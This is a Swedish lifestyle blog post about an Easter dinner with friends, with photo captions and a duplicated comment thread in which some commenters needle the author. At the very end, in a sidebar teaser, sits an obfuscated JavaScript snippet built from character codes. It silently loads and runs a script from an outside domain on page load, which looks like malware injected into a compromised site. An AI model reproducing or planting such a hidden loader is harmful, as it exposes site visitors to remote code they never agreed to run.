Påskmiddag med goda vänner ❤

OLYMPUS DIGITAL CAMERA

Påskmiddag med goda vänner❤

hej fina! Hur mår du?

Igår var jag hos Kin & Alban på en spontan påskmiddag. Vi målade ägg och pysslade innan middagen 🐣

Tjejerna är sååååå gulliga med Ludvig💚

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA


OLYMPUS DIGITAL CAMERA

Anna & Vanessa kom precis innan middagen.

Klassisk påskbord med massor go-saker!

IMG_3683

(Tack bästa Kin ✨🐣🙏🏻)

OLYMPUS DIGITAL CAMERA

Vanessa & Julia 💖

OLYMPUS DIGITAL CAMERA

Vi körde ägg-pickar-tävling… kul, men sjukt svårt 😂

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

Efter ett par timmar med middag och mys så samlades vi i soffan och tittade på Let’s Dance. 

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

Vi hade packat en miniresväska och skulle sov över. Så mysigt! Jag har ju som ni redan vet problem med sömnen till och från. Men imorse vaknade utvilad och hade sovit heeeela natten i sträck. Ludvig tyckte det var super mysigt och längtar redan till nästa gång ❤ 

Tack Kin, Alban och tejerna för mysig, god spontan middag! 🙏🏻❤ Alltid lika trevligt att ses Anna, Roberto och Vanessa.💖

Nu är vi hemma i sigtuna igen. En dag med mys och lugn och ro står på schema! Hörs senare…

kram på dig!

/My Martens

154 Komentarer

 1. Jojo nu myser du, häng och namedroppande med ”kändisar”. Fint ändå att du kunde hålla dig ifrån att lägga ut bilder på halvnaket barn ?

  • Hej ”anonym”! Du talar i gåtor? ”gör inte bort dig” ”en som kan få dåligt rykte”. Antingen talar du i klarspråk eller så kan du lika gärna knipa igen! Tonen i din svårtolkade kommentar är långt ifrån trevlig….? och då kan det lika gärna vara..

 2. Jojo nu myser du, häng och namedroppande med ”kändisar”. Fint ändå att du kunde hålla dig ifrån att lägga ut bilder på halvnaket barn 👍

 3. Glad påsk till dig och sonen! Gillar din blogg, har läst den länge men aldrig kommenterat. Bry dig inte om de elaka kommentarerna, de är korkskruvar som inte har några egna innehållrika liv??

  • Hej ”anonym”! Du talar i gåtor? ”gör inte bort dig” ”en som kan få dåligt rykte”. Antingen talar du i klarspråk eller så kan du lika gärna knipa igen! Tonen i din svårtolkade kommentar är långt ifrån trevlig….😣 och då kan det lika gärna vara..

  • Inte ofta…… vi har ett bord med fyra stolar, så det faller sig mer naturligt när man är många att inte vara hemma hos oss.. hur så?

    • Anette, jag säger inte att mina vänner inte är hembjudna till mig på middagar, fila, utflykter m.m. För det är dom ? Men är det flera familjer samtidigt så brukar vi inte vara hos mig. Då det är trångt Med plats. Då kommer dom oftast en familj åt gången.. sommartid är det annorlunda… då kan man grilla/hänga utomhus och vi har strandpromenaden precis utanför där vi bor… dessutom bor dom flesta i stan, så då tycker dom det är lättare att jag & Lilleman åker in, än att alla andra åker ut. Även om det händer… MEN den storafrågan är väl egentligen varför jag ens ska behöva förklara det? ???

     • Du får frågan för att många tycker att du verkar utnyttja folk. Många tycker att du är som en parasit på andra. Därför får du frågan.

     • ”Maggis” du talar alltid för alla andra ?? ”folk tycker” andra säger, ryktet påstår!
      Att du bara orkar!???? såååå pinsamt! Vi, jag OCH mina vänner, både kända, okända och ö-kända kan inte annat än att skratta åt denna typ av kommentarer…. Vi gör ingen skillnad på oss i vårat gäng. Det är det DU som gör… Nu svarar jag inte mer på dig och dina elaka kommentarer! Utan fortsättningsvis får du ha en envägskommunikation här inne på bloggen….. önskar dig allt gott! Släpp bitterheten, fördomarna och din elaka ton och gör någonting som får DIG att må liiiiite bättre ? Glad påsk ?

 4. Glad påsk till dig och sonen! Gillar din blogg, har läst den länge men aldrig kommenterat. Bry dig inte om de elaka kommentarerna, de är korkskruvar som inte har några egna innehållrika liv😃💪

  • Inte ofta…… vi har ett bord med fyra stolar, så det faller sig mer naturligt när man är många att inte vara hemma hos oss.. hur så?

    • Anette, jag säger inte att mina vänner inte är hembjudna till mig på middagar, fila, utflykter m.m. För det är dom 😂 Men är det flera familjer samtidigt så brukar vi inte vara hos mig. Då det är trångt Med plats. Då kommer dom oftast en familj åt gången.. sommartid är det annorlunda… då kan man grilla/hänga utomhus och vi har strandpromenaden precis utanför där vi bor… dessutom bor dom flesta i stan, så då tycker dom det är lättare att jag & Lilleman åker in, än att alla andra åker ut. Även om det händer… MEN den storafrågan är väl egentligen varför jag ens ska behöva förklara det? 😂😂😂

     • Du får frågan för att många tycker att du verkar utnyttja folk. Många tycker att du är som en parasit på andra. Därför får du frågan.

     • ”Maggis” du talar alltid för alla andra 😂🙈 ”folk tycker” andra säger, ryktet påstår!

      Att du bara orkar!🙈🙈🙈🙈 såååå pinsamt! Vi, jag OCH mina vänner, både kända, okända och ö-kända kan inte annat än att skratta åt denna typ av kommentarer…. Vi gör ingen skillnad på oss i vårat gäng. Det är det DU som gör… Nu svarar jag inte mer på dig och dina elaka kommentarer! Utan fortsättningsvis får du ha en envägskommunikation här inne på bloggen….. önskar dig allt gott! Släpp bitterheten, fördomarna och din elaka ton och gör någonting som får DIG att må liiiiite bättre 😉 Glad påsk 🐣

 5. Hej igen My! I dag skriver jag hos dig två gånger för att jag tycker att det behövs. Jag beklagar för alla elaka människor som skriver illa och nedlåtande! Jag läser några bloggar och tänker ibland att jag inte håller med den som skrivit men då låter jag det bara gå förbi och så när det är något gott jag vill skriva då gör jag det. För det är ändå så att skulle mina kollegor komma till mig stup i ett för att klaga på min vikt, klädsel eller felstavade mail mm då vore det en typ av mobbing och det är aldrig ok. Det gäller ju er som bloggar också för vi är ju dina ”kollegor”/läsare. När mina kollegor berömmer mig så preseterar ännu bättre! ?? Det jag menar är att vi skall vara snälla mot varandra! My du är stark och grym! Tyvärr finns det lite för många elaka men dom skall man strunta i. ❤️ Stärka och acceptera varandra trots våra olikheter! Kram igen ???? ❤️

 6. Hej igen My! I dag skriver jag hos dig två gånger för att jag tycker att det behövs. Jag beklagar för alla elaka människor som skriver illa och nedlåtande! Jag läser några bloggar och tänker ibland att jag inte håller med den som skrivit men då låter jag det bara gå förbi och så när det är något gott jag vill skriva då gör jag det. För det är ändå så att skulle mina kollegor komma till mig stup i ett för att klaga på min vikt, klädsel eller felstavade mail mm då vore det en typ av mobbing och det är aldrig ok. Det gäller ju er som bloggar också för vi är ju dina ”kollegor”/läsare. När mina kollegor berömmer mig så preseterar ännu bättre! 😀😀 Det jag menar är att vi skall vara snälla mot varandra! My du är stark och grym! Tyvärr finns det lite för många elaka men dom skall man strunta i. ❤️ Stärka och acceptera varandra trots våra olikheter! Kram igen 🐔🐣🐔🐣 ❤️

 7. Härligt med spontanmiddagar. Och jag önskar dig o Lilleman en skön påskhelg.
  Och ni som inte kan säga nått snällt, säg inget alls..
  Kram

 8. Om dina vänner inte hadde varit ”kända” undrar om de hade reagerat då? Bjuda tillbaka kan man göra på många sätt.
  Glad påsk till dig och din lilla pojk ???

  • Vi skrattar bara åt kommentarerna ?? Intressant att se hur många det trots allt är som lägger mer energi på mig, mitt liv och mina vänner istället för sitt egna ? vi i våran umgängeskrets gör vi ingen skillnad på vem som är ”känd” och inte. Det är nog mer läsarna som gör ? Glad påsk! ???

 9. Härligt med spontanmiddagar. Och jag önskar dig o Lilleman en skön påskhelg.
  Och ni som inte kan säga nått snällt, säg inget alls..
  Kram

 10. Om dina vänner inte hadde varit ”kända” undrar om de hade reagerat då? Bjuda tillbaka kan man göra på många sätt.
  Glad påsk till dig och din lilla pojk 🐣🐥🐣

  • Vi skrattar bara åt kommentarerna 😂🙈 Intressant att se hur många det trots allt är som lägger mer energi på mig, mitt liv och mina vänner istället för sitt egna 🙈 vi i våran umgängeskrets gör vi ingen skillnad på vem som är ”känd” och inte. Det är nog mer läsarna som gör 😉 Glad påsk! 🐣🐣🐣

 11. Att folk orkar ? Skönt att ni skrattar åt det My!!! Hahaha njut av långhelgen!!! Lova att inte ta åt dig av dessa töntiga komentarer ovan!

 12. Du och din vänner skrattar åt kommentarerna skriver du, så då menar du att dina vänner sitter och läser igenom kommentarsfältet sen tar ni upp det med varandra och skrattar . Stämmer det??

 13. Att folk orkar 😂 Skönt att ni skrattar åt det My!!! Hahaha njut av långhelgen!!! Lova att inte ta åt dig av dessa töntiga komentarer ovan!

 14. Du och din vänner skrattar åt kommentarerna skriver du, så då menar du att dina vänner sitter och läser igenom kommentarsfältet sen tar ni upp det med varandra och skrattar . Stämmer det?😅

 15. Glad påsk???. Tror dom som ger negativa kommentarer till dig är avundsjuka på dig. Dom vill säkert att du skall fortsätta må dåligt så dom kan gotta sig i det?. Allt gott till dig och Lilleman!

 16. Glad påsk🐤🐣🐔. Tror dom som ger negativa kommentarer till dig är avundsjuka på dig. Dom vill säkert att du skall fortsätta må dåligt så dom kan gotta sig i det🤗. Allt gott till dig och Lilleman!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/